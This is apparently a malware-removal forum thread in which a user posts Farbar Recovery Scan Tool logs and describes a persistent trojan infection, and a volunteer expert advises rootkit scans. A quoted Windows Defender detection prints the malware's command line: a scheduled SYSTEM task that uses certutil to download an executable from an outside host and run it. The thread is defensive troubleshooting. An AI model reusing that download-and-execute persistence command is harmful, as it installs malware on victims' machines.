Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat ()

==================== Loaded Modules (Whitelisted) =============

2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL
2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL
2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL
2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll
2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\WINDOWS\System32\pdfcmon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1                   auth.cycling74.com
127.0.0.1                   auth64.cycling74.com
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com
127.0.0.1       65.52.240.48
127.0.0.1       oscount.techsmith.com
127.0.0.1       69.167.144.18
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318
FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.)
FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]

==================== Restore Points =========================

19-11-2019 13:12:33 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/25/2019 01:39:05 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/25/2019 01:38:31 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/25/2019 01:38:18 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Local Hostname DESKTOP-A0OS1Q6.local already in use; will try DESKTOP-A0OS1Q6-2.local instead

Error: (11/25/2019 01:38:18 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister    4 DESKTOP-A0OS1Q6.local. Addr 192.168.1.8

Error: (11/25/2019 01:38:18 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.1.8:5353   16 DESKTOP-A0OS1Q6.local. AAAA 2A02:2149:8760:9E00:3949:B56E:7C2E:3B0B


System errors:
=============
Error: (11/25/2019 01:40:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/25/2019 01:40:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/25/2019 01:35:23 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/25/2019 01:35:23 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/25/2019 01:35:23 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.


Windows Defender:
===================================
Date: 2019-11-25 01:38:49.423
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2744.0, AS: 1.305.2744.0, NIS: 1.305.2744.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

CodeIntegrity:
===================================

Date: 2019-11-25 01:38:49.794
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 28%
Total physical RAM: 16331.55 MB
Available physical RAM: 11668.86 MB
Total Virtual: 16631.55 MB
Available Virtual: 10186.83 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:231.78 GB) (Free:64.88 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:158.16 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS

\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================


  • 0

#6
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

Some issues remain:

1) When I start Firefox and go to Google, periodically they still ask me to verify I am not a robot, because there has been suspicious activity from my IP.
2) Some of my bookmarked internet pages in Firefox’s toolbar do not respond when clicking on them, while others do respond.
3) Worst of all, I got a few PC crashes with blue screens since yesterday. During the last one, which was at 18.45 today the screen remained stuck at the blue screen (the PC did not restart automatically) after it had completed 100% of the info selection. So, I had to shut down with the button and restart it myself. On the blue screen it said “CRITICAL STRUCTURE CORRUPTION”.
4) Windows defender notifies me several times per day that it has found threats and in the history I can see some Trojans, mostly Trojan:Win32/Ceprolad.A being repeated.

What has stopped so far is the sudden opening of browsers windows. Also I can now open Malwarebytes or install its new version.

Do you think it's a good idea to install and run it, or should I wait for your instructions?

Thank you
 


  • 0

#7
RKinner

RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

The infection is still with us so see if you can get MBAM to scan.  In addition try their new rootkit scan MBAR: 

https://www.malwareb...om/antirootkit/

 

Then run a new FRST scan so I can see if it got it.

 

PS  Don't worry about delays.  I do not keep track.
 


  • 0

#8
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

After your reply I tried to run MBAM but again this time, I could not access it.
So, instead I ran their mbar. It found a lot of malware which it cleaned up!
Then I rebooted and tried MBAM once more and this time I was able to run it. It found only 1 PUP.Optional.Online.IO which it quarantined. Then I rebooted again.
Then I ran FRST and here is the two logs:

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 25-11-2019 01
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (26-11-2019 14:02:38)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MusNotifyIcon.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe

